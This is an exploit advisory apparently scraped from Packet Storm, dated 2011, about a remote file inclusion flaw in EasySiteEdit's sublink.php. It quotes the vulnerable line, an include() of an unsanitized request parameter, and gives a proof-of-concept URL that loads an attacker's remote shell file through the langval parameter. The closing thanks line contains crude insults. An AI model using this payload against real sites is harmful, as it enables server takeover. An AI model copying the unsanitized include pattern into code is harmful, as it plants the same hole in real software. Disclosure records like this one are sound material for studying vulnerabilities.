EasySiteEdit Remote File Inclusion

2011-08-22T00:00:00
ID PACKETSTORM:104292
Type packetstorm
Reporter koskesh jakesh
Modified 2011-08-22T00:00:00

Description

                                        
                                            `# Exploit Title: EasySiteEdit remote file include  
# Date:2011  
# Author:koskesh jakesh  
# Software Link: http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip  
# Tested on: linux  
-------------------------------  
vul:sublink.php  
line 20:  
include($_REQUEST['langval']);  
-------------------------------  
poc:  
site.com/path/sublink.php?langval=shell.txt?  
--------------------------------  
thanks:kire rostam,kose zan dait,kose shohar amat  
  
`